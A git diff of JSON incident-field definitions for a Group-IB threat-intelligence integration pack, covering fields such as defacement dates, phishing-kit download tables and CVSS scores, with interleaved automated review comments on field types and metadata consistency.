+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json
new file mode 100644
index 000000000000..54ea992db980
--- /dev/null
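Review bot: GIB_Deface_Contacts is an `"openEnded": true` `multiSelect`, so as far as I can tell every distinct contact string scraped from a defacement page can become a new selectable value of the field, and that value set is fed entirely by attacker-authored page content. Unless analysts need to filter incidents by contact value, a `shortText` or `markdown` field stores the same data without growing an unbounded, attacker-controlled option list; if multiSelect is kept, the mapper should trim and cap the values it writes into `gibdefacecontacts`.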
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Date.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibdefacedate", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdefacedate", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Deface Date", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "date", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json new file mode 100644 index 000000000000..b316ef344677 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Site_URL.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibdefacesiteurl", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdefacesiteurl", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Deface Site URL", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
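Review bot: GIB_Deface_Site_URL is typed `url`, which, if I recall the field type's rendering correctly, shows the value as a clickable link in the incident layout to a site that by the definition of this incident type has been compromised and may still serve attacker content. A `shortText` field keeps the value searchable without inviting a click-through; the same consideration applies to the `url`-typed GIB_DDOS_Target_URL (L100). If link rendering is wanted for analyst convenience, that trade-off should be stated in the pack README so deployments can override the type.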
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json
new file mode 100644
index 000000000000..9d2b849d791b
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Deface_Source.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibdefacesource",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibdefacesource",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Deface Source",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json
index d1004897517a..a6c74f57b608 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From.json
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Brand Protection Phishing Kit"
+ "GIB Brand Protection Phishing Kit",
+ "GIB Attacks Phishing Group"
 ],
 "caseInsensitive": true,
 "cliName": "gibdownloadedfrom",
@@ -22,8 +23,14 @@
 "threshold": 72,
 "type": "markdown",
 "unmapped": false,
- "unsearchable": false,
+ "unsearchable": true,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Phishing Kit",
+ "GIB Attacks Phishing Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json
new file mode 100644
index 000000000000..f9d3e39711dc
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Downloaded_From_Table.json
@@ -0,0 +1,106 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Phishing Kit" + ], + "caseInsensitive": true, + "cliName": "gibdownloadedfromtable", + "closeForm": true, + "columns": [ + { + "displayName": "Date", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "date", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "URL", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "url", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Phishing URL", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "phishingurl", + "orgType": "url", + "required": false, + "script": "", + "selectValues": null, + "type": "url", + "width": 150 + }, + { + "displayName": "Domain", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "domain", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "File Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "filename", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibdownloadedfromtable", + "isReadOnly": false, + "locked": false, + "name": "GIB Downloaded From Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Phishing Kit" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": 
-1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json index f3b5a312fcf9..82e16c48d85a 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json index 1cf17e470ffd..d773fea48b0e 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Drop_Email_Domain.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Compromised Account" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json index 98399174290d..d21997322a08 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email.json 
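Review bot: The metadata on GIB Downloaded From Table differs from the other new fields in this patch without an evident reason: it carries `"propagationLabels": ["all"]` and has no `"itemVersion"`, while e.g. GIB Extended CVSS Base has `"itemVersion": "1.4.2"` and no propagation labels. If these keys are artifacts of exporting from different server instances, normalise them (drop `propagationLabels`/`itemVersion` everywhere, or set them the same way on every field) so a later re-export does not produce a spurious diff. The `Phishing URL` column is also `url`-typed and so is presumably rendered as a live link to the phishing page in the grid.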
@@ -28,5 +28,13 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Data Breach", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json new file mode 100644 index 000000000000..e9710624181b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Email_Domains.json @@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibemaildomains", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibemaildomains", + "isReadOnly": false, + "locked": false, + "name": "GIB Email Domains", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json new file mode 100644 index 000000000000..194817cf07c5 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Emails.json 
@@ -0,0 +1,33 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Data Breach" + ], + "caseInsensitive": true, + "cliName": "gibemails", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibemails", + "isReadOnly": false, + "locked": false, + "name": "GIB Emails", + "neverSetAsRequired": false, + "openEnded": true, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Data Breach" + ], + "threshold": 72, + "type": "multiSelect", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json new file mode 100644 index 000000000000..00fe6f0be464 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Base.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssbase", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssbase", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Base", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json new file mode 100644 index 000000000000..322a0191ede9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Exploitability.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssexploitability", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssexploitability", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Exploitability", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json new file mode 100644 index 000000000000..8b825a90bd39 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Impact.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssimpact", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssimpact", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Impact", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json new file mode 100644 index 000000000000..4f57975cf716 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Overall.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvssoverall", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvssoverall", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Overall", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json new file mode 100644 index 000000000000..40bcd7106fdb --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_CVSS_Temporal.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendedcvsstemporal", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendedcvsstemporal", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended CVSS Temporal", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "number", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json new file mode 100644 index 000000000000..21b8af27d2c9 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Extended_Description.json 
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibextendeddescription", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibextendeddescription", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Extended Description", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "longText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json index ace486ab9559..aa9fc489746f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Favicon.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Domain" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json new file mode 100644 index 000000000000..f539f48027fe --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_GIT_Source.json 
@@ -0,0 +1,36 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Git Leak"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibgitsource",
+ "closeForm": false,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibgitsource",
+ "isReadOnly": false,
+ "locked": false,
+ "name": "GIB GIT Source",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "propagationLabels": [
+ "all"
+ ],
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Git Leak"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json
index 7699013181a5..a4d59b9be3a0 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_HTML.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Brand Protection Domain"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json
new file mode 100644
index 000000000000..85bd50a86295
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Has_Exploit.json
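Review bot: `"closeForm": false` on GIB GIT Source makes it the only new field in this patch that is left out of the close form; every other new field here sets `"closeForm": true`. If that is deliberate (the leaking repository is not something an analyst records at close time) a one-line mention in the PR description would save the next reviewer the question; otherwise set `"closeForm": true` for consistency. The field also carries `"propagationLabels": ["all"]` and no `"itemVersion"`, unlike most of its siblings, which looks like an export artifact worth normalising.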
@@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibhasexploit", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibhasexploit", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Has Exploit", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "boolean", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json new file mode 100644 index 000000000000..e4b6d9e7e1a8 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Href.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB OSI Vulnerability" + ], + "caseInsensitive": true, + "cliName": "gibhref", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibhref", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Href", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB OSI Vulnerability" + ], + "threshold": 72, + "type": "url", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json index 36c70a2f3da3..d05f21fdcdb3 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_ID.json @@ -9,7 +9,26 @@ "GIB OSI Public Leak", "GIB Targeted Malware", "GIB Data Breach", - "GIB Brand Protection Domain" + "GIB Brand Protection Domain", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": false, "cliName": "gibid", 
@@ -34,5 +53,37 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Brand Protection Phishing", + "GIB Brand Protection Phishing Kit", + "GIB Compromised Account", + "GIB Compromised Card", + "GIB OSI Git Leak", + "GIB OSI Public Leak", + "GIB Targeted Malware", + "GIB Data Breach", + "GIB Brand Protection Domain", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Malware", + "GIB Malware CNC", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Cybercriminal Threat Actor", + "GIB Nation-State Cybercriminals Threat Actor", + "GIB Nation-State Cybercriminals Threat" + ] } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json index 9c52c9d9ece9..98b7ad93c73b 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_Dump.json @@ -25,5 +25,10 @@ "unsearchable": false, "useAsKpi": false, "version": -1, - "fromVersion": "6.0.0" + "fromVersion": "6.0.0", + "itemVersion": "1.4.2", + "openEnded": false, + "systemAssociatedTypes": [ + "GIB Targeted Malware" + ] } \ No newline at end of file 
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json
index a2a5837b5403..504046fcb66f 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Inject_MD5.json
@@ -26,7 +26,9 @@
 "useAsKpi": false,
 "version": -1,
 "fromVersion": "6.0.0",
- "marketplaces": [
- "xsoar"
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Targeted Malware"
 ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json
new file mode 100644
index 000000000000..af281317c835
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Is_Tailored.json
@@ -0,0 +1,36 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Cybercriminal Threat",
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibistailored",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibistailored",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Is Tailored",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Cybercriminal Threat",
+ "GIB Nation-State Cybercriminals Threat"
+ ],
+ "threshold": 72,
+ "type": "tagsSelect",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
